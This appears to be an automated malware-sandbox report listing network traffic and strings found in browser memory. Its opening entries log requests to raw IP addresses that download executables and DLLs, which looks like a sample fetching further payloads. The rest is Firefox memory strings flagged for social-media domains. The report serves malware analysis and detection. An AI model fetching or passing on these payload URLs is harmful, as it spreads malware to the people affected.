Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlhttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/Duration of the experiment from the start date in days. Note that this property is only used during the analysis phase (not by the SDK) equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlhttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/Duration of the experiment from the start date in days. Note that this property is only used during the analysis phase (not by the SDK) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://ssl.google-analytics.com/ga.jsFileUtils_closeAtomicFileOutputStream*://s0.2mdn.net/instream/html5/ima3.js*://libs.coremetrics.com/eluminate.js*://static.chartbeat.com/js/chartbeat.js*://connect.facebook.net/*/all.js*https://smartblock.firefox.etp/facebook.svg*://track.adform.net/serving/scripts/trackpoint/*://www.everestjs.net/static/st.v3.js*pictureinpicture%40mozilla.org:1.0.0webcompat-reporter%40mozilla.org:1.5.1*://www.rva311.com/static/js/main.*.chunk.jsresource://gre/modules/FileUtils.sys.mjshttps://smartblock.firefox.etp/play.svg*://auth.9c9media.ca/auth/main.js*://static.criteo.net/js/ld/publishertag.js*://c.amazon-adsystem.com/aax2/apstag.jsresource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter@mozilla.org.xpi*://pub.doubleverify.com/signals/pub.js**://static.chartbeat.com/js/chartbeat_video.js@mozilla.org/addons/addon-manager-startup;1*://*.imgur.com/js/vendor.*.bundle.js*://web-assets.toggl.com/app/assets/scripts/*.js*://cdn.branch.io/branch-latest.min.js**://connect.facebook.net/*/sdk.js**://www.googletagmanager.com/gtm.js**://*.imgur.io/js/vendor.*.bundle.js*://www.google-analytics.com/plugins/ua/ec.jsFileUtils_closeSafeFileOutputStream*://www.google-analytics.com/gtm/js**://www.google-analytics.com/analytics.js*blocklisted:FEATURE_FAILURE_PARSE_DRIVER equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder 
hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3645713303.000001C23E5E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3637244801.000001C23DABF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3624693263.000001C23CCF6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3632371300.000001C23D163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @mozilla.org/uriloader/handler-service;1@mozilla.org/dom/slow-script-debug;1browser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNames^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools.debugger.remote-websocketreleaseDistinctSystemPrincipalLoaderdevtools.performance.recording.ui-base-urlDevToolsStartup.jsm:handleDebuggerFlagdevtools/client/framework/devtoolsresource://devtools/server/devtools-server.jsdevtools/client/framework/devtools-browserdevtools-commandkey-javascript-tracing-toggleand deploy previews URLs are allowed.resource://devtools/shared/security/socket.jsdevtools.performance.popup.feature-flagdevtools.debugger.features.javascript-tracingDevTools telemetry entry point failed: JSON Viewer's onSave failed in startPersistencebrowser and that URL. Falling back to Unable to start devtools server on Failed to listen. Listener already attached.devtools-commandkey-profiler-capture{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Failed to execute WebChannel callback:No callback set for this channel.Got invalid request to save JSON dataWebChannel/this._originCheckCallback@mozilla.org/network/protocol;1?name=filedevtools-commandkey-profiler-start-stopFailed to listen. 
Callback argument missing.@mozilla.org/network/protocol;1?name=default@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjshttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPCan't invoke URIFixup in the content process{c6cf88b7-452e-47eb-bdc9-86e3561648ef}http://www.inbox.lv/rfc2368/?value=%s^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?handlerSvc fillHandlerInfo: don't know this typehttp://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/web-handler-app;1get FIXUP_FLAGS_MAKE_ALTERNATE_URI^([a-z+.-]+:\/{0,3})*([^\/@]+@).+^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)browser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_FORCE_ALTERNATE_URIScheme should be either http or httpsresource://gre/modules/FileUtils.sys.mjsisDownloadsImprovementsAlreadyMigratedhttps://mail.yahoo.co.jp/compose/?To=%shttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s{33d75835-722f-42c0-89cc-44f328e56a86}https://e.mail.ru/cgi-bin/sentmsg?mailto=%sgecko.handlerService.defaultHandlersVersionextractScheme/fixupChangedProtocol<@mozilla.org/uriloader/dbus-handler-app;1_injectDefaultProtocolHandlersIfNeededhttps://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/JSONFile.sys.mjshttps://mail.inbox.lv/compose?to=%s@mozilla.org/network/file-input-stream;1Must have a source and a callback@mozilla.org/network/simple-stream-listener;1resource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStreamNon-zero amount of bytes must be specified_finalizeInternal/this._finalizePromise<resource://gre/modules/ExtHandlerService.sys.mjs@mozilla.org
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/microsoftLogin.js equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/microsoftLogin.js equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/microsoftLogin.js equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238554000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", 
"*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D00B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3628973173.000001C23CF19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3628973173.000001C23CF19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: addons-search-detection@mozilla.com*://pubads.g.doubleclick.net/gampad/*xml_vmap2**://trends.google.com/trends/embed*resource://builtin-addons/search-detection/addons-search-detection%40mozilla.com:2.0.0*://www.facebook.com/platform/impression.php**://*.adsafeprotected.com/*/Serving/*https://en.wikipedia.org/wiki/Special:Search**://*.adsafeprotected.com/jload?*{3f78ada1-cba2-442a-82dd-d5fb300ddea7} equals www.facebook.com (Facebook)
